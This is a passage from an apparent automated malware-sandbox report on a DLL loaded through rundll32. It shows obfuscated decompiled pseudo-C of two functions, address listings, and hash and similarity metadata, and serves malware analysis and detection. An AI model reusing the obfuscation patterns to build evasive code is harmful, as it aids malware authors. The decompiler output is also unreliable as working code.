				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x70)) + 0x6bebe5;
				 *(__r9 + 0x488) =  *(__r9 + 0x488) | _t662;
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0x18)) =  *( *(__r9 + 0x240) + 0x70) - 0x1487;
				 *(__r9 + 0x488) =  *(__r9 + 0x488) | _t662;
				 *(_t685 + 0x120) = _t453 - 0xac5;
				goto 0x535f739f;
				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x298) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x298) ^ ( *( *(__r9 + 0x2a0) + 0x130) | 0x000010ae);
				 *((long long*)(__r9 + 0x640)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x640))));
				 *(__r9 + 0x138) =  *(__r9 + 0x138) |  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x1a8)) + 0x00001515;
				 *( *(__r9 + 0x2a0) + 0x230) =  *( *(__r9 + 0x2a0) + 0x230) * ( *(__r9 + 0x240) + 0x188);
				 *( *(__r9 + 0x108) + 0x398) =  *( *(__r9 + 0x108) + 0x398) * ( *( *((intOrPtr*)(__r9 + 0x20)) + 0xb0) | 0x00001c76);
				 *((char*)(_t685 + 0x48)) = 1;
				r8d = 0x1ad7;
				 *(_t685 + 0x40) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x68)) - 0x1568;
				 *((long long*)(_t685 + 0x38)) = _t585;
				 *((long long*)(_t685 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x640)) + 0x60));
				 *(_t685 + 0x28) = r15w;
				 *((long long*)(_t685 + 0x20)) = _t700;
				if (E00007FFA7FFA535FB3DC(_t585, __r9, _t677, _t680, _t682, _t700, _t697, _t709, _t705, _t702, _t700, _t677) != 0) goto 0x535f72fd;
				_t170 = _t677 + 0x1b9; // 0x129b
				r10d = _t170;
				r8d =  *(_t685 + 0x84);
				_t455 = _t705 + 0x74b;
				r8d = r8d + 0x89a;
				_t616 =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x640)) + 0x30));
				r14d = r14d + 0xb9;
				 *((long long*)(__r9 + 0x5f8)) = _t616;
				r11d = __r9 + 0x1320;
				 *((intOrPtr*)(_t685 + 0x78)) = _t682 + 0xe67;
				 *(_t685 + 0x70) = r10d;
				 *(_t685 + 0x68) = r11d;
				r15d = _t616 + 0x96b;
				 *((intOrPtr*)(_t685 + 0x60)) = _t680 - 0x61b;
				r12d = _t616 + 0x1348;
				 *((intOrPtr*)(_t685 + 0x58)) = _t455;
				 *((intOrPtr*)(_t685 + 0x50)) = _t705 + 0xcb8;
				 *((long long*)(_t685 + 0x48)) = __r9;
				 *(_t685 + 0x40) =  *(_t685 + 0x118);
				r9d = _t616 + 0x9ab;
				 *((intOrPtr*)(_t685 + 0x38)) = _t462 + 0x2cd;
				 *((intOrPtr*)(_t685 + 0x30)) = r14d;
				 *(_t685 + 0x28) = r15d;
				 *((intOrPtr*)(_t685 + 0x20)) = r12d;
				_t367 = E00007FFA7FFA535F9404( *(_t685 + 0x118), _t680 - 0x61b,  *(_t685 + 0x120) + 0xffffff47,  *((intOrPtr*)(_t685 + 0x88)) + 0x1582, _t705 + 0xcb8, _t462 + 0x2cd, _t585, __r9, _t680, _t687, __r10);
				r10d = _t367;
				r9d =  *(_t685 + 0x100);
				r9d = r9d - 0x11;
				_t464 =  *(_t685 + 0x8c);
				r15d =  *(_t685 + 0x90);
				r12d =  *((intOrPtr*)(_t685 + 0x94));
				 *( *((intOrPtr*)(__r9 + 0x468)) + 4) =  *( *(__r9 + 0x240) + 0x148) ^ 0x65694525;
				 *(_t685 + 0x118) = _t367;
				 *(_t685 + 0x100) = r9d;
				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x300) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x300) ^ 0xfffff14b;
				 *( *((intOrPtr*)(__r9 + 0x468)) + 8) =  *((intOrPtr*)( *(__r9 + 0x108) + 0x1b0)) + 0x53662f9d;
				if (r15d - _t682 + 0x9c9 >= 0) goto 0x535f7a1d;
				_t218 = _t695 + 0x214; // 0x214
				if (r9d != _t218) goto 0x535f76c3;
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x70)) + 0x69744ede;
				 *( *(__r9 + 0x108) + 0x440) =  *( *(__r9 + 0x108) + 0x440) * ( *( *(__r9 + 0x108) + 0x140) ^ 0x00001515);
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x70)) + 0x59e8;
				 *((intOrPtr*)( *(__r9 + 0x2a0) + 0xd8)) =  *((intOrPtr*)( *(__r9 + 0x2a0) + 0xd8)) + 0xffffea03 -  *(__r9 + 0x3d0);
				 *( *(__r9 + 0x110) + 0x248) =  *( *(__r9 + 0x110) + 0x248) *  *( *(__r9 + 0x110) + 0x40) * 0x1515;
				_t545 =  *((intOrPtr*)(__r9 + 0x440)) - 0x11f1;
				 *( *(__r9 + 0x240) + 0x5e0) =  *( *(__r9 + 0x240) + 0x5e0) | _t545;
				 *((intOrPtr*)(__r9 + 0x3e0))();
				 *(__r9 + 0x290) = _t545;
				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x188) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x188) * ( *(__r9 + 0xb0) | 0x000012ad);
				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x18) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x18) ^  *( *((intOrPtr*)(__r9 + 0x160)) + 0x138) * 0x0000145c;
				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x368) =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x248) | 0x00001ba7;
				_t371 = GetCurrentThreadId();
				r9d =  *(_t685 + 0x100);
				_t461 =  *(_t685 + 0x84) + 0xc13;
				 *(__r9 + 0x200) = _t371;
				_t410 =  *((intOrPtr*)(_t685 + 0x108)) + 0xc8d;
				if ( *((intOrPtr*)(_t685 + 0x98)) - _t682 + 0x268 > 0) goto 0x535f7a1d;
				if ( *(__r9 + 0x2c8) !=  *(_t685 + 0xe8) -  *((intOrPtr*)(__r9 + 0x128))) goto 0x535f7a1d;
				_t688 = r15d;
				if ( *((intOrPtr*)(__r9 + 0x70)) - (_t688 & r9d |  *(__r9 + 0x480)) <= 0) goto 0x535f79e8;
				if (r12d - ( *(__r9 + 0x250) &  *(__r9 + 0x2d8) | _t461) >= 0) goto 0x535f7a01;
				_t696 =  *(_t685 + 0x120);
				_t672 =  *(__r9 + 0x420);
				r15d =  *(_t685 + 0xf0);
				 *(__r9 + 0x390) =  *(__r9 + 0x390) ^  *(_t685 + 0xe0) -  *((intOrPtr*)(__r9 + 0x1b0));
				_t558 = _t672 + _t688;
				 *((intOrPtr*)(__r9 + 0x3c8)) =  *((intOrPtr*)(__r9 + 0x3c8)) + _t558;
				r8d = _t680 + 0x1569;
				r11d = r11d - (r15d ^  *(_t685 + 0x80));
				 *(__r9 + 0x368) =  *(__r9 + 0x368) * _t558;
				_t707 = r11d;
				 *(_t685 + 0xe8) = r11d;
				 *(__r9 + 0x178) =  *(__r9 + 0x178) * ( *(_t685 + 0x118) & _t707);
				_t645 =  *(__r9 + 0x3c0);
				 *(__r9 + 0x420) =  *(__r9 + 0x5d0) * _t461 + _t672;
				 *((intOrPtr*)(__r9 + 0x70)) =  *((intOrPtr*)(__r9 + 0x70)) + (_t696 & _t707);
				r15d = r15d + ( *(__r9 + 0x2c8) |  *(__r9 + 0x2a0));
				 *(_t685 + 0xf0) = r15d;
				r15d = _t696 + _t688;
				r15d = r15d ^ r8d;
				r15d = r15d * ( *((intOrPtr*)(__r9 + 0x20)) -  *(_t685 + 0xe0));
				 *(__r9 + 0x350) =  *(__r9 + 0x350) ^ _t696 *  *(__r9 + 0x1d0) ^ _t696;
				 *((intOrPtr*)(__r9 + 0x58)) =  *((intOrPtr*)(__r9 + 0x58)) + (_t645 &  *(__r9 + 0x240));
				_t690 =  *(_t685 + 0xe0) * 0x0000181f ^  *(__r9 + 0x110);
				 *(__r9 + 0x3c0) =  *(__r9 + 0x2e8) &  *(__r9 + 0x148) ^ _t645 ^ 0x00000c92;
				 *(__r9 + 0x3d0) =  *(__r9 + 0x3d0) + _t464 * 0x1320;
				 *((intOrPtr*)(__r9 + 0x88)) =  *((intOrPtr*)(__r9 + 0x88)) - ( *(__r9 + 0x310) &  *(__r9 + 0x2a0));
				 *(__r9 + 0xc0) =  *(__r9 + 0xc0) |  *(__r9 + 0x3d0) ^ _t690;
				r8d =  *(_t685 + 0xe0);
				r8d = r8d * ( *(__r9 + 0x3a0) | 0x00000c92);
				 *(__r9 + 0x110) = (_t696 + _t682 ^ _t707) + _t690;
				 *(_t685 + 0xe0) = r8d;
				 *(_t685 + 0x80) = _t464 * r8d;
				 *(__r9 + 0x250) =  *(__r9 + 0x250) |  *((intOrPtr*)(__r9 + 0x4b0)) +  *(__r9 + 0x2d8);
				r11d = r11d - (r11d | _t410 | 0x00001355);
				 *(_t685 + 0x118) = r11d;
				 *(__r9 + 0x18) =  *(__r9 + 0x140) *  *(__r9 + 0x3a0);
				r8d =  *(__r9 + 0x298);
				r8d = r8d ^ 0x00001515;
				 *(__r9 + 0xa0) =  *(__r9 + 0xa0) * (r9d * _t410 | 0x000010ae);
				__imp__GetCurrentActCtx(_t680, _t682);
				r9d =  *(_t685 + 0x100);
				 *(__r9 + 0x1d0) =  *(__r9 + 0x1d0) + 0xffffea97 -  *((intOrPtr*)(__r9 + 0x130));
				 *(_t685 + 0x120) =  *(_t685 + 0x120) |  *(_t685 + 0x80) -  *((intOrPtr*)(__r9 + 0x1b0)) &  *(__r9 + 0x108);
				r11d =  *(_t685 + 0xe8);
				goto 0x535f7a01;
				r12d = r12d + ( *(__r9 + 0x330) &  *(__r9 + 0x138)) *  *(__r9 + 0x420);
				if (_t455 + 4 == _t707 -  *((intOrPtr*)(__r9 + 0x128))) goto 0x535f76fe;
				return _t585 - 0xbff;
			}









































                0x7ffa535f6e94
                0x7ffa535f6e94
                0x7ffa535f6e94
                0x7ffa535f6ea4
                0x7ffa535f6eab
                0x7ffa535f6eb9
                0x7ffa535f6ec6
                0x7ffa535f6ed7
                0x7ffa535f6edf
                0x7ffa535f6ee6
                0x7ffa535f6eed
                0x7ffa535f6efb
                0x7ffa535f6f02
                0x7ffa535f6f09
                0x7ffa535f6f11
                0x7ffa535f6f17
                0x7ffa535f6f26
                0x7ffa535f6f2d
                0x7ffa535f6f34
                0x7ffa535f6f3b
                0x7ffa535f6f43
                0x7ffa535f6f4a
                0x7ffa535f6f51
                0x7ffa535f6f58
                0x7ffa535f6f60
                0x7ffa535f6f66
                0x7ffa535f6f6e
                0x7ffa535f6f72
                0x7ffa535f6f7f
                0x7ffa535f6f87
                0x7ffa535f6f90
                0x7ffa535f6f9d
                0x7ffa535f6fbd
                0x7ffa535f6fc8
                0x7ffa535f6fdd
                0x7ffa535f6fe4
                0x7ffa535f6ff2
                0x7ffa535f6ff9
                0x7ffa535f7024
                0x7ffa535f7041
                0x7ffa535f7050
                0x7ffa535f7057
                0x7ffa535f7068
                0x7ffa535f707c
                0x7ffa535f70a0
                0x7ffa535f70ae
                0x7ffa535f70bc
                0x7ffa535f70ca
                0x7ffa535f70d8
                0x7ffa535f70fb
                0x7ffa535f7109
                0x7ffa535f7110
                0x7ffa535f7119
                0x7ffa535f712f
                0x7ffa535f7136
                0x7ffa535f713d
                0x7ffa535f7160
                0x7ffa535f7181
                0x7ffa535f719a
                0x7ffa535f71bd
                0x7ffa535f71c3
                0x7ffa535f71db
                0x7ffa535f71fc
                0x7ffa535f7206
                0x7ffa535f7222
                0x7ffa535f7243
                0x7ffa535f7246
                0x7ffa535f725b
                0x7ffa535f7270
                0x7ffa535f7278
                0x7ffa535f727e
                0x7ffa535f7285
                0x7ffa535f72a6
                0x7ffa535f72c0
                0x7ffa535f72c3
                0x7ffa535f72e1
                0x7ffa535f72e4
                0x7ffa535f72f1
                0x7ffa535f72f8
                0x7ffa535f7319
                0x7ffa535f7338
                0x7ffa535f734d
                0x7ffa535f736d
                0x7ffa535f7398
                0x7ffa535f73a9
                0x7ffa535f73ae
                0x7ffa535f73c9
                0x7ffa535f73d0
                0x7ffa535f73d9
                0x7ffa535f73de
                0x7ffa535f73e4
                0x7ffa535f73f0
                0x7ffa535f73fd
                0x7ffa535f73fd
                0x7ffa535f7411
                0x7ffa535f7419
                0x7ffa535f7427
                0x7ffa535f742e
                0x7ffa535f7432
                0x7ffa535f7439
                0x7ffa535f744d
                0x7ffa535f7454
                0x7ffa535f746b
                0x7ffa535f7470
                0x7ffa535f7475
                0x7ffa535f747c
                0x7ffa535f7480
                0x7ffa535f748e
                0x7ffa535f7492
                0x7ffa535f7496
                0x7ffa535f749b
                0x7ffa535f749f
                0x7ffa535f74a6
                0x7ffa535f74b0
                0x7ffa535f74b5
                0x7ffa535f74ba
                0x7ffa535f74bf
                0x7ffa535f74cb
                0x7ffa535f74ce
                0x7ffa535f74dd
                0x7ffa535f74e1
                0x7ffa535f7502
                0x7ffa535f750a
                0x7ffa535f7512
                0x7ffa535f751c
                0x7ffa535f7523
                0x7ffa535f752b
                0x7ffa535f7550
                0x7ffa535f755c
                0x7ffa535f7562
                0x7ffa535f756c
                0x7ffa535f7589
                0x7ffa535f75ac
                0x7ffa535f75ca
                0x7ffa535f75e2
                0x7ffa535f7603
                0x7ffa535f761f
                0x7ffa535f7625
                0x7ffa535f7633
                0x7ffa535f7645
                0x7ffa535f765e
                0x7ffa535f767b
                0x7ffa535f769b
                0x7ffa535f76a2
                0x7ffa535f76a8
                0x7ffa535f76b0
                0x7ffa535f76b6
                0x7ffa535f76bd
                0x7ffa535f76d0
                0x7ffa535f76f5
                0x7ffa535f76fe
                0x7ffa535f7712
                0x7ffa535f7732
                0x7ffa535f7738
                0x7ffa535f7740
                0x7ffa535f7747
                0x7ffa535f775e
                0x7ffa535f7765
                0x7ffa535f7769
                0x7ffa535f7770
                0x7ffa535f7797
                0x7ffa535f779a
                0x7ffa535f77a8
                0x7ffa535f77ab
                0x7ffa535f77c8
                0x7ffa535f77da
                0x7ffa535f77e7
                0x7ffa535f77ff
                0x7ffa535f7803
                0x7ffa535f7818
                0x7ffa535f7820
                0x7ffa535f7824
                0x7ffa535f7827
                0x7ffa535f7839
                0x7ffa535f7858
                0x7ffa535f785c
                0x7ffa535f787a
                0x7ffa535f788a
                0x7ffa535f78a2
                0x7ffa535f78ac
                0x7ffa535f78cc
                0x7ffa535f78d4
                0x7ffa535f78da
                0x7ffa535f78e1
                0x7ffa535f78f4
                0x7ffa535f7909
                0x7ffa535f7928
                0x7ffa535f793a
                0x7ffa535f7942
                0x7ffa535f795a
                0x7ffa535f7968
                0x7ffa535f7998
                0x7ffa535f799f
                0x7ffa535f79a5
                0x7ffa535f79bb
                0x7ffa535f79d7
                0x7ffa535f79de
                0x7ffa535f79e6
                0x7ffa535f79fe
                0x7ffa535f7a17
                0x7ffa535f7a3d

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Current$Thread
                • String ID:
                • API String ID: 307130322-0
                • Opcode ID: b6237a3a3b9deda18b18038b162085afe4ec634ee142353ba3905221f4e90038
                • Instruction ID: 4454e397b7b2b59c77274ae8f317610f3f77a2307492b9aa5073a1679c87697e
                • Opcode Fuzzy Hash: b6237a3a3b9deda18b18038b162085afe4ec634ee142353ba3905221f4e90038
                • Instruction Fuzzy Hash: 44520872614BD88AD794CF19D588BEA77ACFB89B84F064126EB8D87750DF38D950CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F7A40 Relevance: 3.5, APIs: 2, Instructions: 511pipeCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 75%
                			E00007FFA7FFA535F7A40(void* __ebx, void* __esi, void* __rax, long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r9, signed long long __r11) {
				void* __rsi;
				void* __rbp;
				signed int _t451;
				signed int _t458;
				signed int _t459;
				signed int _t480;
				signed int _t496;
				signed int _t518;
				void* _t524;
				void* _t525;
				signed int _t526;
				intOrPtr _t537;
				void* _t539;
				intOrPtr _t543;
				void* _t545;
				intOrPtr _t572;
				intOrPtr _t589;
				long long _t596;
				long long _t606;
				long long _t638;
				signed long long _t639;
				signed long long _t653;
				signed int* _t665;
				intOrPtr _t698;
				intOrPtr _t708;
				void* _t719;
				void* _t721;
				void* _t723;
				void* _t724;
				void* _t740;
				signed long long _t744;
				signed long long _t747;
				void* _t749;
				struct _CRITICAL_SECTION* _t751;

				_t744 = __r11;
				_t726 = __r8;
				_t638 = __rbx;
				 *((long long*)(_t723 + 0x10)) = __rbx;
				_push(_t721);
				_push(_t719);
				_push(_t747);
				_t724 = _t723 - 0x70;
				r14d =  *(_t724 + 0xd0);
				_t3 = _t726 - 0xa42; // -2074
				r15d =  *(_t724 + 0xe8);
				_t5 = _t726 - 0x96b; // -1859
				r12d = __r9 - 0x1556;
				r9d = r9d + 0xfffff9c2;
				 *(_t724 + 0xc0) = _t3;
				r15d = r15d + 0xfec;
				 *(_t724 + 0xb0) = r9d;
				 *((intOrPtr*)(_t724 + 0x50)) = _t5;
				 *(_t724 + 0xd0) =  *((intOrPtr*)(_t724 + 0xd8)) + 0x7b;
				_t12 = _t726 - 0x1a1; // 0x87
				r14d = r14d + 0xffffece0;
				_t13 = _t721 + 0xfe4; // 0x8a1
				r8d = r15d;
				_t524 = __rcx - 0xf3;
				if (_t12 - _t13 >= 0) goto 0x535f8158;
				r10d = __rbx - 0x83;
				 *((intOrPtr*)(_t724 + 0x48)) = _t749 + 0x1c76;
				r11d = _t719 + 0x7ef;
				 *(_t724 + 0x40) = r10d;
				 *((long long*)(_t724 + 0x38)) = __rdx;
				 *(_t724 + 0x30) = r11d;
				_t25 = _t721 + 0x1482; // 0xd3f
				r9d = _t25;
				 *(_t724 + 0x28) = _t719 - 0x8cc;
				r8d = _t751 - 0x62d;
				 *(_t724 + 0x20) = _t751 - 0xaf9;
				E00007FFA7FFA535F8C00(_t751 - 0xaf9, _t5, __rbx, __rdx, _t719, __r8, __r9, _t740);
				 *(__rdx + 0x61c) = 6;
				r9d = 0;
				r13d = 0x1582;
				r14d = 0x8000001f;
				_t32 = _t721 + 1; // 0x1583
				_t458 = _t32;
				 *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) ^  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x298)) - 0x00000c92;
				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) +  *((intOrPtr*)(__rdx + 0x610));
				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4) +  *((intOrPtr*)(__rdx + 0x614));
				if ( *((intOrPtr*)(__rdx + 0x600)) <= 0) goto 0x535f7dca;
				r10d = 0;
				 *(__rdx + 0x3c8) =  *(__rdx + 0x130) | _t747;
				 *((intOrPtr*)(__rdx + 0x2f8)) =  *((intOrPtr*)(__rdx + 0x2f8)) - ( *( *(__rdx + 0x240) + 0x5d0) ^ 0x000011f1);
				 *((long long*)( *((intOrPtr*)(__rdx + 0x110)) + 8)) = 0x2fce;
				_t537 =  *((intOrPtr*)(__rdx + 0x604));
				if (_t537 <= 0) goto 0x535f7d4d;
				 *((long long*)( *((intOrPtr*)(__rdx + 0x358)) + 0x2f8)) =  *((intOrPtr*)(__rdx + 0x298));
				 *((long long*)(__rdx + 0x298)) =  *((long long*)(__rdx + 0x298)) - 1;
				 *(__rdx + 0x128) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x110)) + 0x250)) - 0x1515;
				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) ^  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4);
				if (_t537 >= 0) goto 0x535f7c5a;
				_t698 =  *((intOrPtr*)(__rdx + 0x430));
				r8d =  *(_t698 +  *(__rdx + 0x608) * 4);
				if ((( *(__rdx + 0x61c) & r14d) - _t458 | 0xffffffe0) + _t458 == 0) goto 0x535f7c73;
				asm("inc ecx");
				r10d = r10d + _t458;
				 *((intOrPtr*)(_t698 +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)(_t698 +  *(__rdx + 0x60c) * 4)) + r8d;
				 *( *((intOrPtr*)(__rdx + 0x110)) + 0x410) =  *( *((intOrPtr*)(__rdx + 0x110)) + 0x410) |  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128);
				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) - 1;
				_t653 =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x138) ^ 0x00001355;
				 *( *(__rdx + 0x108) + 0x330) = _t653;
				asm("cdq");
				 *(__rdx + 0x608) = ( *(__rdx + 0x608) + _t458) %  *(__rdx + 0x458);
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x5d0)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x5d0)) + _t653 -  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x440));
				asm("cdq");
				 *(__rdx + 0x60c) = ( *(__rdx + 0x60c) + _t458) %  *(__rdx + 0x458);
				 *((long long*)( *((intOrPtr*)(__rdx + 0x110)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248));
				 *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248)) =  *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248)) - 1;
				_t539 = r10d -  *((intOrPtr*)(__rdx + 0x604));
				if (_t539 < 0) goto 0x535f7bf3;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) +  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4);
				if (_t539 >= 0) goto 0x535f7d82;
				_t572 =  *((intOrPtr*)(__rdx + 0x430));
				if ((( *(__rdx + 0x618) & r14d) - _t458 | 0xffffffe0) + _t458 == 0) goto 0x535f7d9d;
				r8d =  *(_t572 +  *(__rdx + 0x608) * 4);
				asm("inc ecx");
				goto 0x535f7da8;
				r8d =  *(_t572 +  *(__rdx + 0x608) * 4);
				r9d = r9d + _t458;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) + r8d;
				if (r9d -  *((intOrPtr*)(__rdx + 0x600)) < 0) goto 0x535f7ba8;
				 *((intOrPtr*)(__rdx + 0x600)) = 0x3b610b;
				r9d = 0;
				 *(__rdx + 0x608) = 7;
				r11d = 0x1b47;
				 *(__rdx + 0x60c) = 4;
				 *((intOrPtr*)(__rdx + 0x610)) = 0xf6da;
				 *((intOrPtr*)(__rdx + 0x614)) = 0x18551;
				 *((intOrPtr*)(__rdx + 0x604)) = 0xe5;
				 *(__rdx + 0x618) = 8;
				 *( *(__rdx + 0x108) + 0x4b8) =  *( *(__rdx + 0x108) + 0x4b8) ^ 0x000010ae;
				 *(__rdx + 0x61c) = 0xb;
				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) +  *((intOrPtr*)(__rdx + 0x610));
				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4) +  *((intOrPtr*)(__rdx + 0x614));
				 *( *(__rdx + 0x240) + 0x310) =  *( *(__rdx + 0x240) + 0x310) ^ ( *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) | _t747);
				if ( *((intOrPtr*)(__rdx + 0x600)) <= 0) goto 0x535f804d;
				r10d = 0;
				 *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x128)) = 0x1b3e5bc;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x90)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x90)) +  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) - 0x1ba7;
				_t543 =  *((intOrPtr*)(__rdx + 0x604));
				if (_t543 <= 0) goto 0x535f7fb1;
				 *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) =  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4) ^  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4);
				if (_t543 >= 0) goto 0x535f7efe;
				_t708 =  *((intOrPtr*)(__rdx + 0x430));
				r8d =  *(_t708 +  *(__rdx + 0x608) * 4);
				if ((( *(__rdx + 0x61c) & r14d) - _t458 | 0xffffffe0) + _t458 == 0) goto 0x535f7f17;
				asm("inc ecx");
				r10d = r10d + _t458;
				 *((intOrPtr*)(_t708 +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)(_t708 +  *(__rdx + 0x60c) * 4)) + r8d;
				_t665 =  *(__rdx + 0x108);
				 *(__rdx + 0x128) =  *(__rdx + 0x128) ^  *_t665;
				 *_t665 =  *_t665 + _t638;
				 *((intOrPtr*)( *(__rdx + 0x240) + 0x140)) =  *((intOrPtr*)( *(__rdx + 0x240) + 0x140)) +  *(__rdx + 0x108) - 0xffffff80;
				_t480 =  *(__rdx + 0x458);
				asm("cdq");
				 *(__rdx + 0x608) = ( *(__rdx + 0x608) + _t458) % _t480;
				asm("cdq");
				 *(__rdx + 0x60c) = ( *(__rdx + 0x60c) + _t458) % _t480;
				 *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x230) =  *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x230) * ( *( *(__rdx + 0x240) + 0xc8) ^ _t747);
				_t545 = r10d -  *((intOrPtr*)(__rdx + 0x604));
				if (_t545 < 0) goto 0x535f7ecf;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) - ( *( *(__rdx + 0x108) + 0x170) ^ _t744);
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) +  *( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4);
				if (_t545 >= 0) goto 0x535f8005;
				_t589 =  *((intOrPtr*)(__rdx + 0x430));
				if ((( *(__rdx + 0x618) & r14d) - _t458 | 0xffffffe0) + _t458 == 0) goto 0x535f8020;
				r8d =  *(_t589 +  *(__rdx + 0x608) * 4);
				asm("inc ecx");
				goto 0x535f802b;
				r8d =  *(_t589 +  *(__rdx + 0x608) * 4);
				r9d = r9d + _t458;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) + r8d;
				if (r9d -  *((intOrPtr*)(__rdx + 0x600)) < 0) goto 0x535f7e8b;
				 *((intOrPtr*)(__rdx + 0x98)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x68)) + 0x14a3a2;
				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x1a8) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x1a8) | _t744;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) +  *((intOrPtr*)(__rdx + 0x110)) + 0x238;
				_t596 =  *(__rdx + 0x2a8) + 0x149810;
				 *((long long*)(__rdx + 0x1b8)) = _t596;
				E00007FFA7FFA535E229C(_t638,  *(__rdx + 0x608), _t719, _t721, __rdx);
				 *((long long*)(__rdx + 0x78)) = _t596;
				_t525 = _t524 + 0x650;
